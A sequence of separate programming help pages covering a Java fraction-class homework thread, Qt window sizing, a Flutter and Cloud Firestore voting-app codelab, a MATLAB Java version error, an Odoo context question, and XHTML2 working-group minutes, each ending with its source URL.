The 80-point version requires the methods getNum, getDen and getDecimal. Method getNum returns the integer numerator, getDen returns the integer denominator and the getDecimal method returns a real number decimal value of the fraction. For example, if the numerator is 3 and the denominator is 4, getDecimal will return 0.75

80 (and 90) Point Version Output 1
The GUI windows appear one after the other. They do not all show up simultaneously as shown below. The windows will display on top of the current desktop and they are smaller than the windows shown for this sample execution.

80 (and 90) Point Version Output 2

90 Point Version Specifics
The 90-point version adds the getRational method. This method returns a String representation of the fraction. For example, if the numerator is 3 and the denominator is 4, getRational will return 3/4

Concatenation Hint: You probably know that String variables/values can be concatenated together. Example: "John" + "Smith" = "JohnSmith" What you may not know is that other data types can be concatenated with Strings as well. Example: "John" + 19 = "John19" This shows an int being concatenated to the end of a String.

Even though the output of the 90 point version is identical to the 80 point version (see previous page), the showMessageDialog statement will need to be changed in the main method for the 90 point version to work properly. (See below.) Now a single call to getRational replaces the 2 calls to methods getNum and getDen.

90 Point Version Code :
public static void main (String args[])
{
    ...
    JOptionPane.showMessageDialog(null,r.getRational() + " equals " + r.getDecimal());
    System.exit(0);
}

100 Point Version Specifics
The 100-point version adds the getOriginal and reduce methods as well as firstNum and firstDen variable attributes. The constructor also needs to be changed. This version of the lab assignment reduces the fraction, if possible. The output displays something like 15/20 reduces to 3/4. Without additional variables, the original values of the numerator and denominator will be lost. You need to achieve the following sequence. The Rational constructor initializes all variables and then reduces the fraction. The reduce method needs getGCF to ensure maximum reduction. As with the 90 point version, the showMessageDialog statement will need to be changed in the main method for this program to work properly. (See below.)

100 Point Version Code :
public static void main (String args[])
{
    String strNbr1 = JOptionPane.showInputDialog("Enter Numerator 1");
    String strNbr2 = JOptionPane.showInputDialog("Enter Denominator 2");
    int num = Integer.parseInt(strNbr1);
    int den = Integer.parseInt(strNbr2);
    Rational r = new Rational(num,den);
    JOptionPane.showMessageDialog(null,r.getOriginal() + " equals " + r.getDecimal() + "\n and reduces to " + r.getRational());
    System.exit(0);
}

Here is the original Word Doc that describes the lab. Here is the Java file I am provided with.

If you can help me figure this out I would be most appreciative.
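To see what the 100-point version is driving at without handing over the Java answer, here is the same logic sketched in Python: Euclid's algorithm from the provided getGCF, plus the reduce-on-construction behavior the spec describes. The method and variable names mirror the assignment, but this is a sketch of the idea, not the graded solution:

```python
def get_gcf(n1, n2):
    # Euclid's algorithm, exactly as in the provided Java getGCF
    rem = n1 % n2
    while rem != 0:
        n1, n2 = n2, rem
        rem = n1 % n2
    return n2

class Rational:
    def __init__(self, num, den):
        self.first_num = num   # keep the originals so getOriginal still works
        self.first_den = den
        g = get_gcf(num, den)  # the constructor reduces the fraction right away
        self.num = num // g
        self.den = den // g

    def get_decimal(self):
        return self.num / self.den

    def get_rational(self):
        return f"{self.num}/{self.den}"

    def get_original(self):
        return f"{self.first_num}/{self.first_den}"

r = Rational(15, 20)
print(f"{r.get_original()} equals {r.get_decimal()} and reduces to {r.get_rational()}")
# 15/20 equals 0.75 and reduces to 3/4
```

The key insight for the 100-point version is the ordering: store firstNum/firstDen before reducing, so the original fraction survives the reduction.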
http://www.javaprogrammingforums.com/%20object-oriented-programming/11694-rational-class-program-%5Bhomework-help%5D-printingthethread.html
In the desktop designer we would always use the tw.object namespace to initialize a complex variable. In the web designer, the tw.object namespace does not exist. We have found several workarounds using default values in the Variables tab, but this approach is limited. How do we properly initialize these variables on the fly within our BPM process?

Answer by Brandon Dickey (875) | Aug 29, 2017 at 12:57 PM

The tw.object namespace should still exist in the Web Process Designer. The page you highlighted is still applicable in the BPM 8.5.7 Web Process Designer. Where are you seeing the issue with using the tw.object namespace? I believe Client Side Human Services may not be able to use that namespace, but Heritage Human Services would be able to use it in that case.
https://developer.ibm.com/answers/questions/397128/initialize-variables-in-the-bpm-web-designer.html?smartspace=bpm
The following compile errors were returned when building mstore:

mstore.c: In function `read_event':
mstore.c:423: warning: passing arg 2 of `ical_preprocess' from incompatible pointer type
mstore.c: In function `write_event':
mstore.c:457: warning: unsigned int format, long unsigned int arg (arg 3)

This, I believe, is because size_t on OS X is not an int but an unsigned long, which also calls for some conversion before passing such values to standard library formatting functions. Similar errors occur when compiling icap:

icaproutines.c: In function `icap_literal':
icaproutines.c:167: warning: unsigned int format, long unsigned int arg (arg 3)

Modifications required for building:

1. In mstore.c, #include "crypt.h" is required to be commented out, as this is a part of "unistd.h" on OS X.
2. In the Makefile for libmcal, the "-shared" flag needs to be replaced by "-bundle -flat_namespace -undefined suppress"
https://sourceforge.net/p/libmcal/bugs/26/
Getting QMainWindow to fit its central widget

This question was already asked in various forms, but I cannot find a solution to my particular case. I am trying to create a QWidget top window that has an initial size and is resizable. The complication comes from these two facts:
- The widget needs a menu bar
- The widget cannot have a layout, because parts of it are painted, so its children need to be positioned by absolute x-y coordinates.

To solve the first point, I have embedded the widget in the center of a QMainWindow, but am now incapable of making the QMainWindow honor the initial size requirement. I would like to avoid calculating an initial size for the QMainWindow, because I'm not sure how portable these calculations would be. Setting the central widget to a fixed size solves the initial size problem, but then the QMainWindow can no longer be resized. Setting a minimum size also solves it, but then it cannot be resized below that size. After a few hours of wrestling with the problem and trying various combinations, can someone whose understanding of size policies exceeds mine help with this case?

Hi, I'm not 100% sure about "making the QMainWindow honor the initial size requirement". Normally it would be the other way around: making the widget follow the size of the mainwindow. So I'm not sure why you cannot add a layout to the mainwindow and add a widget to that, so it follows the mainwindow; then in this widget you can use paintEvent for drawing and also direct x,y positions, since it has no layout inside. Like this: the green widget would be your own widget doing the drawing.

Thanks for answering and for the example. I know that QMainWindow has a layout and that is not my problem. The problem is that it resizes the widget. I would like the widget to start with a size that is determined when creating it; it is not always the same size as in your example, and the painted part is not identical for all invocations. I am forced to embed it in a QMainWindow, because otherwise having a menu is too complicated. But I wish the widget to start initially with a size that is determined at the time of its creation, and to force the QMainWindow to give the widget that exact size. For future resizes by the user, enlarging or reducing, the QMainWindow may do its stuff in the normal way.

- mrjj Qt Champions 2016

But it's still not clear to me why you cannot let the widget follow the mainwindow and then just set the mainwindow to a size that allows the size of the widget you want. If you set ui->IMSELFPAINTED->setMinimumSize(800,600); I get a green area of that size, and the mainwindow somewhat bigger. Can you not do it like that? Then later, maybe in showEvent, call ui->IMSELFPAINTED->setMinimumSize(0,0); to allow any resize.

I currently do use setMinimumSize as a stop-gap measure while developing. The setMinimumSize(0,0) solution is certainly much simpler than all my monkeying with size policies. Question: is showEvent for the central widget safe enough? I mean, is it called after all size adjustments were already set (at least until some future resize)?

@Harry123 well, it would be showEvent for the mainwindow. Normally it's safe, yes. All sizes are set and layouts resolved.

@Harry123 Good luck. Note: I just added a layout to the mainwindow and then a widget (the green one), so it's not directly on the centralwidget.

- Chris Kawa Moderators

You don't need all this toying around. The default size policy is QSizePolicy::Preferred, which means it uses the size hint of the widget when it is shown. As for the menu bar, the easiest way is to add it to the layout. You don't have to use that layout for any other children. It can be there just for the menu bar and you can place other children manually.
Here's a demo:

#include <QApplication>
#include <QPushButton>
#include <QMenuBar>
#include <QVBoxLayout>

struct Foo : public QWidget {
    QSize sizeHint() const override { return QSize(400,400); }
};

int main(int argc, char *argv[])
{
    QApplication a(argc, argv);
    Foo foo;
    foo.setLayout(new QVBoxLayout()); //use a layout for menu bar
    foo.layout()->setMenuBar(new QMenuBar());
    foo.layout()->menuBar()->addAction(new QAction("Hi!", &foo));
    QPushButton* p = new QPushButton(&foo); //don't use layout, place it manually
    p->move(100,100);
    foo.show();
    return a.exec();
}

If you really don't want the layout for some reason, here's the version with a main window wrapper, but it's not really necessary:

#include <QApplication>
#include <QMainWindow>
#include <QPushButton>
#include <QMenuBar>

struct Foo : public QWidget {
    QSize sizeHint() const override { return QSize(400,400); }
};

int main(int argc, char *argv[])
{
    QApplication a(argc, argv);
    QMainWindow w;
    w.setMenuBar(new QMenuBar()); //use the built-in layout for menu bar
    w.menuBar()->addAction("Hi!");
    w.setCentralWidget(new Foo); //place the widget in built-in layout
    QPushButton* p = new QPushButton(w.centralWidget()); //place the child manually
    p->move(100,100);
    w.show();
    return a.exec();
}

I tested this and it works, but there is a problem with the menubar now obscuring the upper part of the widget. First, this would require modifying all paint functions using absolute coordinates to add a vertical offset equal to the height of the menubar, which is not a simple job. Second, it requires manually increasing the height of the widget. These entail the kind of assumptions on my part regarding the GUI which I try to avoid. I prefer to let Qt do this kind of calculation, for portability.

- Chris Kawa Moderators

Ok then, you can use the second variant. QMainWindow will do the calculations for you, but...

First, this would require modifying all paint functions (...) which is not a simple job.

Actually it's a one-liner:

void Widget::paintEvent(QPaintEvent* evt)
{
    QPainter p(this);
    p.setTransform(QTransform::fromTranslate(0, layout()->menuBar()->height()));
    //paint as usual
}

Second, it requires manually increasing the height of the widget. These entail the kind of assumptions on my part regarding the GUI which I try to avoid.

No assumptions needed:

QSize sizeHint() const override
{
    return QSize(400, 400 + layout()->menuBar()->height());
}

If you're extra paranoid you can also check the layout and menubar for null pointers, but that's not really necessary here.

I'm learning a lot from your answers, but regarding "No assumptions needed", there is one big assumption here: that the menubar is part of the widget and is displayed on top. I never programmed on the Mac or Android, but I'm not too sure that this assumption will hold there or on all other platforms where Qt was or will be ported.

- Chris Kawa Moderators

there is one big assumption here

Right. I'm not an expert on other platforms either. I think the menu can indeed not be a part of the window, at least on Mac. Ok then. The wrapper option should still be valid in these scenarios.

Your solution works, and works beautifully. And what's more, it is probably almost guaranteed to work on all future versions of Qt. So it's a hack, but who cares, as long as it works so well and is so easy to implement.
https://forum.qt.io/topic/64825/getting-qmainwindow-to-fit-its-central-widget
If you're familiar with object-oriented programming concepts, you should be able to complete this codelab. You don't need previous experience with Dart, mobile programming, or Firebase, although completing an introductory Flutter codelab first can be helpful.

In this codelab, you'll learn how to create a Flutter app that uses Firebase. The app helps new parents choose baby names by letting friends and family vote for their favorites. Specifically, the app accesses a Cloud Firestore database, and a user action in your app (i.e., tapping a name option) updates the database atomically.

Here's what the final app will look like, on both iOS and Android. Yes, you read that right! With Flutter, when you build your app, you can use the same code for both iOS and Android!

You might want to watch the 11-minute Using Firestore as a back-end to your Flutter app video that demonstrates building a similar app in real time. It provides a good overview of the steps you'll complete in this codelab.

You need the following software to complete this codelab:
- The Flutter SDK (includes Flutter's command-line tools)
- An editor (you can use your preferred editor)
- Xcode (for iOS development)
- Android Studio (for Android development)

You can run this codelab using one or more of the following devices:
- A physical device (i.e., mobile phone): Android or iOS
- The iOS simulator (requires installing Xcode tools)
- The Android emulator (requires installing and setup in Android Studio)

Follow the Get Started: Test Drive guide to create a new Flutter app. Name the app baby_names instead of flutter_app. The instructions for creating a new Flutter app differ depending on your editor. If you're using an IDE, a new app is usually called a project.

If your app is running in your emulator or device, close it before continuing.

In your IDE or editor, open the pubspec.yaml file. Add a dependency for cloud_firestore, then save the file.
dependencies:
  flutter:
    sdk: flutter
  cloud_firestore: ^0.13.0+1 # new

In your IDE, run flutter packages get. Or, from the command line at the top of the project, run flutter packages get to add the Flutter packages. If you get an error, make sure that the indentation in your dependencies block is exactly as shown above, using two spaces (not a tab).

(If developing on Android...) Update minSdkVersion

Firebase plugins for Flutter on Android require a slightly higher version of the Android SDK than a default Flutter application. If you're developing your application on Android, you'll need to bump its minSdkVersion to 21 for the app to keep compiling after you add the cloud_firestore dependency:

- In your IDE or editor, open the android/app/build.gradle file. Locate the defaultConfig section, which will contain a minSdkVersion entry, and set it to 21:

defaultConfig {
    ...
    minSdkVersion 21 // updated from 16
    ...
}

- Save the file
- Using the Get Started: Test Drive page as a guide, run the default app in an emulator or on a device. Flutter takes about a minute to build the app. The good news is that this is the last time you'll wait for compilation in this codelab; the rest of your changes will be hot-reloaded.

When your app is finished building, you should see the following app:

- Using your IDE or editor, open lib/main.dart. This file currently contains the entire code for the default Flutter app.
- Delete all of the code in main.dart, then replace it with the following:

import 'package:cloud_firestore/cloud_firestore.dart';
import 'package:flutter/material.dart';

void main() => runApp(MyApp());

final dummySnapshot = [
  {"name": "Filip", "votes": 15},
  {"name": "Abraham", "votes": 14},
  {"name": "Richard", "votes": 11},
  {"name": "Ike", "votes": 10},
  {"name": "Justin", "votes": 1},
];

class MyApp extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    return MaterialApp(
      title: 'Baby Names',
      home: MyHomePage(),
    );
  }
}

class MyHomePage extends StatefulWidget {
  @override
  _MyHomePageState createState() => _MyHomePageState();
}

class _MyHomePageState extends State<MyHomePage> {
  @override
  Widget build(BuildContext context) {
    return Scaffold(
      appBar: AppBar(title: Text('Baby Name Votes')),
      body: _buildBody(context),
    );
  }

  Widget _buildBody(BuildContext context) {
    // TODO: get actual snapshot from Cloud Firestore
    return _buildList(context, dummySnapshot);
  }

  Widget _buildList(BuildContext context, List<Map> snapshot) {
    return ListView(
      padding: const EdgeInsets.only(top: 20.0),
      children: snapshot.map((data) => _buildListItem(context, data)).toList(),
    );
  }

  Widget _buildListItem(BuildContext context, Map data) {
    final record = Record.fromMap(data);

    return Padding(
      key: ValueKey(record.name),
      padding: const EdgeInsets.symmetric(horizontal: 16.0, vertical: 8.0),
      child: Container(
        decoration: BoxDecoration(
          border: Border.all(color: Colors.grey),
          borderRadius: BorderRadius.circular(5.0),
        ),
        child: ListTile(
          title: Text(record.name),
          trailing: Text(record.votes.toString()),
          onTap: () => print(record),
        ),
      ),
    );
  }
}

class Record {
  final String name;
  final int votes;
  final DocumentReference reference;

  Record.fromMap(Map<String, dynamic> map, {this.reference})
      : assert(map['name'] != null),
        assert(map['votes'] != null),
        name = map['name'],
        votes = map['votes'];

  Record.fromSnapshot(DocumentSnapshot snapshot)
      : this.fromMap(snapshot.data, reference: snapshot.reference);

  @override
  String toString() => "Record<$name:$votes>";
}

- Save the file, then hot-reload your app.
  - If you're using an IDE, just saving the file automatically performs hot-reload.
  - If you're using an editor, enter r in the command line at the same directory location that you ran flutter run.

You should see the following app:

The app is currently just a mock. Clicking on names only prints to the console. The next step is to connect this app to Cloud Firestore. Before doing that, you can read about how the code in main.dart is structured.

- If you have a Firebase account, sign in to it. If you don't have one, you'll need to create a Firebase account. A free plan is sufficient for this codelab (and most development for most apps).
- In the Firebase console, click Add project.
- As shown in the screencap below, enter a name for your Firebase project (for example, "baby names app db") and click "Continue".
- Next, configure Google Analytics. This codelab doesn't use Analytics, so you can turn it off, then click "Create project".
- After a minute or so, your Firebase project will be ready. Click Continue.

After you've created a Firebase project, you can configure one (or more) apps to use that Firebase project.
All you need to do is:
- Register your app's platform-specific ID with Firebase
- Generate configuration files for your app, then add them to your project folders

If you're developing your Flutter app for both iOS and Android, you need to register both the iOS and Android versions separately within the same Firebase project. If you're just developing for one platform, just skip the unneeded section.

In the top-level directory of your Flutter app, there are subdirectories called ios and android. These directories hold the platform-specific configuration files for iOS and Android, respectively.

- In the Firebase console, select Project Overview in the left nav, then click the iOS button under "Get started by adding Firebase to your app". You'll see the dialog shown in the following screencap:
- The important value to provide is the iOS bundle ID, which you'll obtain using the following three steps.
  - In the command line tool, go to the top-level directory of your Flutter app.
  - Run the command open ios/Runner.xcworkspace to open Xcode.
  - In Xcode, click the top-level Runner in the left pane to show the General tab in the right pane, as shown in the screencap below. Copy the Bundle Identifier value.
- Back in the Firebase dialog, paste the copied Bundle Identifier into the iOS bundle ID field, then click Register App.
- Continuing in Firebase, follow the instructions to download the config file GoogleService-Info.plist.
- Go back to Xcode. Notice that Runner has a subfolder also called Runner (as shown in the screencap above).
- Drag the GoogleService-Info.plist file (that you just downloaded) into that Runner subfolder.
- In the dialog that appears in Xcode, click Finish.
- Go back to the Firebase console. In the setup step, click Next, then skip the remaining steps and go back to the main page of the Firebase console.

You're done configuring your Flutter app for iOS!
- In the Firebase Console, select Project Overview in the left nav, then click the Android button under "Get started by adding Firebase to your app". You'll see the dialog shown in the following screencap:
- The important value to provide is the Android package name, which you'll obtain using the following two steps.
  - In your Flutter app directory, open the file android/app/src/main/AndroidManifest.xml.
  - In the manifest element, find the string value of the package attribute. This value is the Android package name (something like com.yourcompany.yourproject). Copy this value.
- In the Firebase dialog, paste the copied package name into the Android package name field.
- (Optional) If you plan to use Google Sign In or Firebase Dynamic Links (note that these are not part of this codelab), you need to provide the Debug signing certificate SHA-1 value. Follow the instructions in the Authenticating Your Client guide to find the debug certificate fingerprint value to paste into that field.
- Click Register App.
- Continuing in Firebase, follow the instructions to download the config file google-services.json.
- Go to your Flutter app directory, then move the google-services.json file (that you just downloaded) into the android/app directory.
- Back in the Firebase console, skip the remaining steps and go back to the main page of the Firebase console.
- Finally, you need the Google Services Gradle plugin to read the google-services.json file that was generated by Firebase.
- In your IDE or editor, open android/app/build.gradle, then add the following line as the last line in the file:

apply plugin: 'com.google.gms.google-services'

- Open android/build.gradle, then inside the buildscript tag, add a new dependency:

buildscript {
    repositories {
        // ...
    }
    dependencies {
        // ...
        classpath 'com.google.gms:google-services:4.3.3' // new
    }
}

- If your app is still running, close and rebuild it to allow gradle to install dependencies.

You're done configuring your Flutter app for Android!
FlutterFire plugins

Your Flutter app should now be connected to Firebase. Flutter provides access to a wide range of platform-specific services, including Firebase APIs and plugins. Plugins include platform-specific code to access services and APIs on iOS and Android. Firebase is accessed through a number of different libraries, one for each Firebase product (for example, databases, authentication, analytics, storage). Flutter provides its own set of plugins to access each Firebase product, collectively called FlutterFire. Be sure to check the FlutterFire GitHub page for the most up-to-date list of FlutterFire plugins.

Your Firebase-Flutter setup is finished, and you're ready to start building your app!

You'll start by setting up Cloud Firestore and initializing it with some values.

- Open the Firebase console, then select the Firebase project that you created during setup.
- From the left nav Develop section, select Database.
- In the Cloud Firestore pane, click Create database.
- In the Security rules for Cloud Firestore dialog, select Start in test mode, then click Enable.

Our database will have one collection, which we'll name "baby". The collection is where the names and votes are stored.

- Click Add Collection, set the collection's name to baby, then click Next.

You can now add documents to your collection. Each document has a Document ID, and we'll need to have name and votes fields (as shown in the screencap below).

- Enter a baby name using all lowercase letters. In this example, we used dana.
- For the existing Field, enter the value of name, select string for the Type, then enter the Value of Dana.
- Click the Add Field icon to add a second field to contain the number of votes. Select number for the Type, then initialize the Value as 0.
- Click Save.
- Add additional baby names by clicking Add Document.

After adding several documents to your collection, your database should look something like this:

Our app is now connected to Cloud Firestore!
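Conceptually, each document in the baby collection carries the same two fields. Sketched as JSON, with document IDs as keys (the dana document comes from the steps above; the second entry is an illustrative example, not from the codelab):

```json
{
  "dana": { "name": "Dana", "votes": 0 },
  "ike":  { "name": "Ike",  "votes": 0 }
}
```

Keeping every document's shape identical is what lets the app map each snapshot straight into a Record object later on.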
It's time to fetch our collection (baby) and use it instead of our dummySnapshot object. From Dart, you get the reference to Cloud Firestore by calling Firestore.instance. Specifically for our collection of baby names, call Firestore.instance.collection('baby').snapshots() to return a stream of snapshots.

Let's plug that stream of data into our Flutter UI using a StreamBuilder widget.

- In your IDE or editor, open lib/main.dart, then find the _buildBody method.
- Replace the entire method with the following code:

Widget _buildBody(BuildContext context) {
  return StreamBuilder<QuerySnapshot>(
    stream: Firestore.instance.collection('baby').snapshots(),
    builder: (context, snapshot) {
      if (!snapshot.hasData) return LinearProgressIndicator();

      return _buildList(context, snapshot.data.documents);
    },
  );
}

- The code that you just copy-pasted has a type error. It's trying to pass a list of DocumentSnapshot to a method that expects something else. Find _buildList and change its signature to this:

Widget _buildList(BuildContext context, List<DocumentSnapshot> snapshot) {
  ...

Instead of a list of Map, it now takes a list of DocumentSnapshot.

- We're almost there. The method _buildListItem still thinks it's getting a Map. Find the start of the method, then replace it with this:

Widget _buildListItem(BuildContext context, DocumentSnapshot data) {
  final record = Record.fromSnapshot(data);

Instead of a Map, you're now taking a DocumentSnapshot, and using the Record.fromSnapshot() named constructor to build the Record.

- (Optional) Remove the dummySnapshot field from the top of lib/main.dart. It's not needed anymore.
- Save the file, then hot-reload your app.
  - If you're using an IDE, just saving the file automatically performs hot-reload.
  - If you're using an editor, enter r in the command line at the same location that you ran flutter run.

After about a second, your app should look like this:

You've just read from the database that you created!
If you want, you can go to the Firebase console and change the database. Your app will reflect the changes almost immediately (after all Cloud Firestore is a real-time database!). Next you will allow users to actually vote! - In lib/main.dart, find the line that says onTap: () => print(record). Change it to this: onTap: () => record.reference.updateData({'votes': record.votes + 1}) Instead of just printing the record to the console, this new line updates the baby name's database reference by incrementing the vote count by one. - Save the file, then hot-reload your app. Voting is now functional, including the update to the user interface. How does this work? When the user taps the tile containing a name, you are telling Cloud Firestore to update the data of that reference. In turn, this causes Cloud Firestore to notify all listeners with the updated snapshot. As your app is listening through the StreamBuilder implemented above, it's updated with the new data. It's hard to spot when testing on a single device, but our current code creates a subtle race condition. If two people with your app vote at the same time, then the value of the votes field would increase by only one – even though two people voted for the name. This is because both apps would read the current value at the same time, add one, then write the same value back to the database. Neither user would notice anything wrong because they would both see the value of votes increase. It's extremely difficult to detect this problem through testing because triggering the error depends on doing two things inside a very small time window. The value of votes is a shared resource, and any time that you update a shared resource (especially when the new value depends on the old value) there is a risk of creating a race condition. Instead, we can add votes using atomic increment. - In lib/main.dart, find the line that says onTap: () => record.reference.updateData({'votes': record.votes + 1}). 
Replace it with this:

onTap: () => record.reference.updateData({'votes': FieldValue.increment(1)})

- Save the file, then hot-reload your app.

Now each vote counts; you removed the race condition.

An equivalent, more general fix is to wrap the read and the write together in a transaction:

onTap: () => Firestore.instance.runTransaction((transaction) async {
  final freshSnapshot = await transaction.get(record.reference);
  final fresh = Record.fromSnapshot(freshSnapshot);

  await transaction.update(record.reference, {'votes': fresh.votes + 1});
}),

How does this work? By wrapping the read and write operations in one transaction, you're telling Cloud Firestore to only commit a change if there was no external change to the underlying data while the transaction was running. If two users aren't concurrently voting on that particular name, the transaction runs exactly once. But if the number of votes changes between the transaction.get(...) and the transaction.update(...) calls, the current run isn't committed, and the transaction is retried. After 5 failed retries, the transaction fails.

Here are the final contents of lib/main.dart.

import 'package:cloud_firestore/cloud_firestore.dart';
import 'package:flutter/material.dart';

void main() => runApp(MyApp());

class MyApp extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    return MaterialApp(
      title: 'Baby Names',
      home: MyHomePage(),
    );
  }
}

class MyHomePage extends StatefulWidget {
  @override
  _MyHomePageState createState() => _MyHomePageState();
}

class _MyHomePageState extends State<MyHomePage> {
  @override
  Widget build(BuildContext context) {
    return Scaffold(
      appBar: AppBar(title: Text('Baby Name Votes')),
      body: _buildBody(context),
    );
  }

  Widget _buildBody(BuildContext context) {
    return StreamBuilder<QuerySnapshot>(
      stream: Firestore.instance.collection('baby').snapshots(),
      builder: (context, snapshot) {
        if (!snapshot.hasData) return LinearProgressIndicator();

        return _buildList(context, snapshot.data.documents);
      },
    );
  }

  Widget _buildList(BuildContext context, List<DocumentSnapshot> snapshot) {
    return ListView(
      padding: const EdgeInsets.only(top: 20.0),
      children: snapshot.map((data) => _buildListItem(context, data)).toList(),
    );
  }

  Widget _buildListItem(BuildContext context, DocumentSnapshot data) {
    final record = Record.fromSnapshot(data);

    return Padding(
      key: ValueKey(record.name),
      padding: const EdgeInsets.symmetric(horizontal: 16.0, vertical: 8.0),
      child: Container(
        decoration: BoxDecoration(
          border: Border.all(color: Colors.grey),
          borderRadius: BorderRadius.circular(5.0),
        ),
        child: ListTile(
          title: Text(record.name),
          trailing: Text(record.votes.toString()),
          onTap: () => record.reference.updateData({'votes': FieldValue.increment(1)}),
        ),
      ),
    );
  }
}

class Record {
  final String name;
  final int votes;
  final DocumentReference reference;

  Record.fromMap(Map<String, dynamic> map, {this.reference})
      : assert(map['name'] != null),
        assert(map['votes'] != null),
        name = map['name'],
        votes = map['votes'];

  Record.fromSnapshot(DocumentSnapshot snapshot)
      : this.fromMap(snapshot.data, reference: snapshot.reference);

  @override
  String toString() => "Record<$name:$votes>";
}

Congratulations! You now know the basics of integrating Flutter apps with Firebase.
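The read-modify-write hazard described above is not specific to Firestore. A Python sketch (my illustration, not part of the codelab) shows the same pattern with threads: the guarded version is the moral equivalent of FieldValue.increment or a transaction, because the read and the write happen as one indivisible step:

```python
import threading

votes = 0
lock = threading.Lock()

def vote_unsafe():
    global votes
    current = votes        # read the shared value...
    votes = current + 1    # ...another voter may have written in between

def vote_safe():
    global votes
    with lock:             # read and write happen as one atomic step
        votes += 1

# 200 concurrent voters, all using the guarded version
threads = [threading.Thread(target=vote_safe) for _ in range(200)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(votes)  # prints 200: every vote counted
```

With vote_unsafe, two voters can both read the same current value and one increment is silently lost, which is exactly the bug the codelab's atomic increment removes.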
You've learned - How to add Firebase functionality to a Flutter app. - How to connect your app to Cloud Firestore for data syncing. - How to update a Cloud Firestore database atomically. Ready to share your new app with friends? Check out how you can generate platform-specific binaries for your Flutter app (an IPA file for iOS and an APK file for Android). Additional resources For more information on Firebase, see: - Firebase website - Cloud Firestore video - Cloud Firestore documentation - Introductory Firebase codelab (for iOS/Swift) (for Android) You might also find these developer resources useful as you continue working with the Flutter framework: - Flutter website - " What's Revolutionary about Flutter" - Write your first Flutter app codelab - Flutter API reference - Additional Flutter sample apps with source code Here are some ways to get the latest news about Flutter: - Join the flutter-dev and flutter-announce mailing lists - Join the Flutter community on Discord - Follow @flutter.dev on Twitter - Star Flutter on GitHub
https://codelabs.developers.google.com/codelabs/flutter-firebase
Hi all. I have a peculiar problem. I am trying to use a Java class in MATLAB. I have made a very simple Java Hello World example:

```
public class HelloWorldApp {
    public static void main(String[] args) {
        System.out.println("Hello World!"); // Display the string.
    }
}
```

After compiling (using jdk1.7.0_04, the 64-bit version), I use javaaddpath to direct MATLAB to the custom class folder, in my case 'c:\temp\javaclass\', so I write:

```
javaaddpath('c:\temp\javaclass\')
```

I then try to create an object:

```
Hello = HelloWorldApp()
```

but I get the error "Undefined function or variable 'HelloWorldApp'." I have spent hours now trying to figure it out; I've read the tutorial several times and have tried looking for answers on MathWorks Answers, but nothing has helped so far. Can anyone point out the reason for my failure?

I tried your example, but I added the path manually to $matlabroot\toolbox\local\classpath.txt (on a new line, simply add):

```
C:\java\
```

Then start MATLAB and check the path with javaclasspath. Finally, call HelloWorldApp:

```
Warning: A Java exception occurred trying to load the HelloWorldApp class:
Java exception occurred: java.lang.UnsupportedClassVersionError: HelloWorldApp : Unsupported major.minor version 51.0
    at com.mathworks.jmi.OpaqueJavaInterface.findClass(OpaqueJavaInterface.java:470)
```

Problem solved: it was the wrong version of the JDK (1.7.0_04). After installing version 1.6.0_31 and compiling again, I was able to add the Java object after invoking the javaaddpath command first. Hurray for totally obscured (non)error messages. That cost me 3 hours of frustration.

This technical note shows how to use the latest Java version:

Indeed, MATLAB uses a 1.6.x version of Java, so you need to compile with a 1.6.x JDK as well (as you did with 1.6.0_31).
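The `Unsupported major.minor version 51.0` error means the class file was compiled for a newer JVM than the one MATLAB embeds (class-file major version 50 is Java 6, 51 is Java 7). As a rough illustration of where that number lives, the sketch below reads the major version straight out of a .class file's header bytes; the function name is my own, but the header layout (4-byte magic, 2-byte minor version, 2-byte major version, all big-endian) is from the JVM class-file format:

```javascript
// Read the class-file major version from the first 8 header bytes:
// bytes 0-3 are the 0xCAFEBABE magic, 4-5 the minor version, 6-7 the major.
function classMajorVersion(bytes) {
  const magicOk = bytes[0] === 0xCA && bytes[1] === 0xFE &&
                  bytes[2] === 0xBA && bytes[3] === 0xBE;
  if (!magicOk) throw new Error('not a Java class file');
  return (bytes[6] << 8) | bytes[7]; // big-endian u16: 50 = Java 6, 51 = Java 7
}
```

Recompiling with a 1.6 JDK, or with `javac -source 1.6 -target 1.6` on a newer JDK (subject to the JDK's supported range), produces major version 50, which the JRE embedded in that era's MATLAB can load.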
http://de.mathworks.com/matlabcentral/answers/37185-cannot-call-java-class-from-matlab
Odoo Help

Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps: CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc.

How to pass a value in context under the v8 API coding standard?

Hello Everyone,

How do I pass a value (information) in context so that the called method can access it? For example: I call the write method of object X and want to pass an extra value in context, so that I can read the passed value via context in the overridden write method of X. How can I achieve this with the v8 API coding standard?

Regards, Anil.

Hi Everyone,

Here is the solution: you can use with_context to achieve this.

For example, I have browse records for object Y and now call the write method on a relational field of Y, which is X. In simple terms, I have a sale order (sale.order) and a partner. Given an order browse record, I can update a value on the partner directly from the order.

Syntax:

```
order.partner_id.with_context(key=value).write({'field': updated_value})
```

E.g.:

```
sale_order.partner_id.with_context(abc=True).write({'email': 'anil.r.kesariya@gmail.com'})
```

Now the write method of the partner will be called, and you can access the value passed via with_context in the overridden write method of the partner, like this:

```
@api.multi
def write(self, vals):
    res = super(res_partner, self).write(vals)
    self._context.get('abc')
    return res
```

Regards, Anil.
https://www.odoo.com/forum/help-1/question/how-to-pass-value-in-context-in-v8-api-coding-standard-87479
Agenda

See also: IRC log

<inserted> scribenick: oeddie
<trackbot> Date: 24 October 2008
<Steven> Meeting: XHTML2 WG FtF, Day 2

RM: did you make changes?
SM: did
RM: in draft dated 20th
SM: yes
RM: went through list and made some changes
... eventtarget name of changed attribute
... main piece

Forms discussion on XML Events 2

<inserted> ScribeNick: oedipus_laptop

SM: added @eventtarget
RM: for listeners
SM: in general
... thought 2 attribute names i changed
RM: other in handler section

XML Events 2 Draft

<inserted> ScribeNick: oedipus

SM: issue remaining: when are events registered?
RM: had an action on that
... when document loaded would be registered and loaded into DOM at that point in time
SP: happen before load events?
RM: could be tricky
SM: reason have to be registered before onLoadEvent fires
SP: onLoadEvent may know stuff necessary for document, which seems to mean that would have to refire onLoad
RM: or protect those looking to load and trigger that way
SP: script run when found
RM: so could be before
<ShaneM> typically you do something like addEvent("load", functionRef);
SP: script would get run before onLoad
... wouldn't the code implementing XML Events 2 need to wait for onLoad itself in order to initialize?
SM: no, not if run inline
SP: has to run up and down tree to register all listener events
... onLoad, but things depend upon it
... maybe that is its own bootstrap problem
